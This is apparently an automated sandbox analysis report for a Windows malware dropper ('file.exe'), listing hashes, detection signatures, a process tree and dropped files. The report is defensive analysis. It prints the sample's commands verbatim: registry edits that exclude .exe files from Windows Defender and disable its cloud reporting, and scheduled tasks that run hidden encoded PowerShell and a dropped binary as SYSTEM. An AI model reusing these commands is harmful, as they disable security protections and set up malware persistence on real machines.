Analysis
-
max time kernel
113s -
max time network
58s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
26-11-2022 21:38
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
b40caf5b378b32a8d0a0166a7c747183
-
SHA1
fe8fef770407ccfe1ce1e6fdfabc243f0c1c2137
-
SHA256
a32b3b6b910709300049be20c8fcb7eebff97e173ca5c7eb673e325b79e4f8b8
-
SHA512
c70be6e8da2a3fbc0d8b6ee5a80c3bbc86cc94c2002ee43db26655cf2342eb63fbb2f69eecc7af21d6a75a206e216951181903d1eb18c11c0b29c0e0375a16e0
-
SSDEEP
196608:91ORsWUPGvhRIglklFFjGc5yegREJdWAG07MVUun5cfdMOltzj:3ORNUuC0kLdyee8EAGzHnqSOltzj
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1852 Install.exe 1368 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 800 file.exe 1852 Install.exe 1852 Install.exe 1852 Install.exe 1852 Install.exe 1368 Install.exe 1368 Install.exe 1368 Install.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bfBwZRfayCkVGrwgTe.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1092 schtasks.exe 672 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1036 powershell.EXE 1036 powershell.EXE 1036 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1036 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 800 wrote to memory of 1852 800 file.exe 28 PID 800 wrote to memory of 1852 800 file.exe 28 PID 800 wrote to memory of 1852 800 file.exe 28 PID 800 wrote to memory of 1852 800 file.exe 28 PID 800 wrote to memory of 1852 800 file.exe 28 PID 800 wrote to memory of 1852 800 file.exe 28 PID 800 wrote to memory of 1852 800 file.exe 28 PID 1852 wrote to memory of 1368 1852 Install.exe 29 PID 1852 wrote to memory of 1368 1852 Install.exe 29 PID 1852 wrote to memory of 1368 1852 Install.exe 29 PID 1852 wrote to memory of 1368 1852 Install.exe 29 PID 1852 wrote to memory of 1368 1852 Install.exe 29 PID 1852 wrote to memory of 1368 1852 Install.exe 29 PID 1852 wrote to memory of 1368 1852 Install.exe 29 PID 1368 wrote to memory of 468 1368 Install.exe 31 PID 1368 wrote to memory of 468 1368 Install.exe 31 PID 1368 wrote to memory of 468 1368 Install.exe 31 PID 1368 wrote to memory of 468 1368 Install.exe 31 PID 1368 wrote to memory of 468 1368 Install.exe 31 PID 1368 wrote to memory of 468 1368 Install.exe 31 PID 1368 wrote to memory of 468 1368 Install.exe 31 PID 1368 wrote to memory of 1860 1368 Install.exe 33 PID 1368 wrote to memory of 1860 1368 Install.exe 33 PID 1368 wrote to memory of 1860 1368 Install.exe 33 PID 1368 wrote to memory of 1860 1368 Install.exe 33 PID 1368 wrote to memory of 1860 1368 Install.exe 33 PID 1368 wrote to memory of 1860 1368 Install.exe 33 PID 1368 wrote to memory of 1860 1368 Install.exe 33 PID 468 wrote to memory of 1144 468 forfiles.exe 35 PID 468 wrote to memory of 1144 468 forfiles.exe 35 PID 468 wrote to memory of 1144 468 forfiles.exe 35 PID 468 wrote to memory of 1144 468 forfiles.exe 35 PID 468 wrote to memory of 1144 468 forfiles.exe 35 PID 468 wrote to memory of 1144 468 forfiles.exe 35 PID 468 wrote to memory of 1144 468 forfiles.exe 35 PID 1860 wrote to memory of 788 1860 forfiles.exe 36 PID 1860 wrote to memory of 788 1860 forfiles.exe 36 PID 1860 wrote to memory of 788 1860 forfiles.exe 36 PID 1860 wrote to memory of 788 1860 forfiles.exe 36 PID 1860 wrote to memory of 788 1860 forfiles.exe 36 PID 1860 wrote to memory of 788 1860 forfiles.exe 36 PID 1860 wrote to memory of 788 1860 forfiles.exe 36 PID 1144 wrote to memory of 896 1144 cmd.exe 37 PID 1144 wrote to memory of 896 1144 cmd.exe 37 PID 1144 wrote to memory of 896 1144 cmd.exe 37 PID 1144 wrote to memory of 896 1144 cmd.exe 37 PID 1144 wrote to memory of 896 1144 cmd.exe 37 PID 1144 wrote to memory of 896 1144 cmd.exe 37 PID 1144 wrote to memory of 896 1144 cmd.exe 37 PID 788 wrote to memory of 324 788 cmd.exe 38 PID 788 wrote to memory of 324 788 cmd.exe 38 PID 788 wrote to memory of 324 788 cmd.exe 38 PID 788 wrote to memory of 324 788 cmd.exe 38 PID 788 wrote to memory of 324 788 cmd.exe 38 PID 788 wrote to memory of 324 788 cmd.exe 38 PID 788 wrote to memory of 324 788 cmd.exe 38 PID 1144 wrote to memory of 1772 1144 cmd.exe 39 PID 1144 wrote to memory of 1772 1144 cmd.exe 39 PID 1144 wrote to memory of 1772 1144 cmd.exe 39 PID 1144 wrote to memory of 1772 1144 cmd.exe 39 PID 1144 wrote to memory of 1772 1144 cmd.exe 39 PID 1144 wrote to memory of 1772 1144 cmd.exe 39 PID 1144 wrote to memory of 1772 1144 cmd.exe 39 PID 788 wrote to memory of 1264 788 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Users\Admin\AppData\Local\Temp\7zSF47D.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\7zSFCE6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:896
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1772
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:788 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:324
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1264
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtTCBJGVX" /SC once /ST 00:53:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtTCBJGVX"4⤵PID:1388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtTCBJGVX"4⤵PID:520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfBwZRfayCkVGrwgTe" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uwsdDVajFzRyiYLif\PIUeLwnNLXyViPD\pjozMzb.exe\" 1s /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:672
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B2409FC5-6F47-4CBD-9861-32D5E9471608} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵PID:1560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1612
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1412
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD56c0b7bfae0100764343204975fa78092
SHA1438694ce367446167954dd3d901b05f2c152bdd3
SHA256869a1b200cd0b1ff4cc3a020327b6f1b5fc6163b96a04b07d3f58fcbe4dd7ea9
SHA512f1eafa29b0a8f864d9a337577196c31f111904f5cd01bd3e24ef206a6675d72d39444ea91e19cb2d99f446434a4792285cd20c00dbfa19997f65bd07fd7800b6
-
Filesize
6.3MB
MD56c0b7bfae0100764343204975fa78092
SHA1438694ce367446167954dd3d901b05f2c152bdd3
SHA256869a1b200cd0b1ff4cc3a020327b6f1b5fc6163b96a04b07d3f58fcbe4dd7ea9
SHA512f1eafa29b0a8f864d9a337577196c31f111904f5cd01bd3e24ef206a6675d72d39444ea91e19cb2d99f446434a4792285cd20c00dbfa19997f65bd07fd7800b6
-
Filesize
6.9MB
MD5f13c959ab9b4f4054a130e0f2fbaa0fc
SHA13c4493352ebe277c8ea86bf1445c869d4314b9f0
SHA256941884d8f2cb6dfcccb8c10166b2343bc573b8959921b55d5f1e7c83ff63da49
SHA5124771b594e97ec3550858bbe670fa52998bed8aeae9c7d11568a55b4861658150311396912a33fb001be4adf99594658bb90c1fb63946ae3330e09372187f1810
-
Filesize
6.9MB
MD5f13c959ab9b4f4054a130e0f2fbaa0fc
SHA13c4493352ebe277c8ea86bf1445c869d4314b9f0
SHA256941884d8f2cb6dfcccb8c10166b2343bc573b8959921b55d5f1e7c83ff63da49
SHA5124771b594e97ec3550858bbe670fa52998bed8aeae9c7d11568a55b4861658150311396912a33fb001be4adf99594658bb90c1fb63946ae3330e09372187f1810
-
Filesize
6.3MB
MD56c0b7bfae0100764343204975fa78092
SHA1438694ce367446167954dd3d901b05f2c152bdd3
SHA256869a1b200cd0b1ff4cc3a020327b6f1b5fc6163b96a04b07d3f58fcbe4dd7ea9
SHA512f1eafa29b0a8f864d9a337577196c31f111904f5cd01bd3e24ef206a6675d72d39444ea91e19cb2d99f446434a4792285cd20c00dbfa19997f65bd07fd7800b6
-
Filesize
6.3MB
MD56c0b7bfae0100764343204975fa78092
SHA1438694ce367446167954dd3d901b05f2c152bdd3
SHA256869a1b200cd0b1ff4cc3a020327b6f1b5fc6163b96a04b07d3f58fcbe4dd7ea9
SHA512f1eafa29b0a8f864d9a337577196c31f111904f5cd01bd3e24ef206a6675d72d39444ea91e19cb2d99f446434a4792285cd20c00dbfa19997f65bd07fd7800b6
-
Filesize
6.3MB
MD56c0b7bfae0100764343204975fa78092
SHA1438694ce367446167954dd3d901b05f2c152bdd3
SHA256869a1b200cd0b1ff4cc3a020327b6f1b5fc6163b96a04b07d3f58fcbe4dd7ea9
SHA512f1eafa29b0a8f864d9a337577196c31f111904f5cd01bd3e24ef206a6675d72d39444ea91e19cb2d99f446434a4792285cd20c00dbfa19997f65bd07fd7800b6
-
Filesize
6.3MB
MD56c0b7bfae0100764343204975fa78092
SHA1438694ce367446167954dd3d901b05f2c152bdd3
SHA256869a1b200cd0b1ff4cc3a020327b6f1b5fc6163b96a04b07d3f58fcbe4dd7ea9
SHA512f1eafa29b0a8f864d9a337577196c31f111904f5cd01bd3e24ef206a6675d72d39444ea91e19cb2d99f446434a4792285cd20c00dbfa19997f65bd07fd7800b6
-
Filesize
6.9MB
MD5f13c959ab9b4f4054a130e0f2fbaa0fc
SHA13c4493352ebe277c8ea86bf1445c869d4314b9f0
SHA256941884d8f2cb6dfcccb8c10166b2343bc573b8959921b55d5f1e7c83ff63da49
SHA5124771b594e97ec3550858bbe670fa52998bed8aeae9c7d11568a55b4861658150311396912a33fb001be4adf99594658bb90c1fb63946ae3330e09372187f1810
-
Filesize
6.9MB
MD5f13c959ab9b4f4054a130e0f2fbaa0fc
SHA13c4493352ebe277c8ea86bf1445c869d4314b9f0
SHA256941884d8f2cb6dfcccb8c10166b2343bc573b8959921b55d5f1e7c83ff63da49
SHA5124771b594e97ec3550858bbe670fa52998bed8aeae9c7d11568a55b4861658150311396912a33fb001be4adf99594658bb90c1fb63946ae3330e09372187f1810
-
Filesize
6.9MB
MD5f13c959ab9b4f4054a130e0f2fbaa0fc
SHA13c4493352ebe277c8ea86bf1445c869d4314b9f0
SHA256941884d8f2cb6dfcccb8c10166b2343bc573b8959921b55d5f1e7c83ff63da49
SHA5124771b594e97ec3550858bbe670fa52998bed8aeae9c7d11568a55b4861658150311396912a33fb001be4adf99594658bb90c1fb63946ae3330e09372187f1810
-
Filesize
6.9MB
MD5f13c959ab9b4f4054a130e0f2fbaa0fc
SHA13c4493352ebe277c8ea86bf1445c869d4314b9f0
SHA256941884d8f2cb6dfcccb8c10166b2343bc573b8959921b55d5f1e7c83ff63da49
SHA5124771b594e97ec3550858bbe670fa52998bed8aeae9c7d11568a55b4861658150311396912a33fb001be4adf99594658bb90c1fb63946ae3330e09372187f1810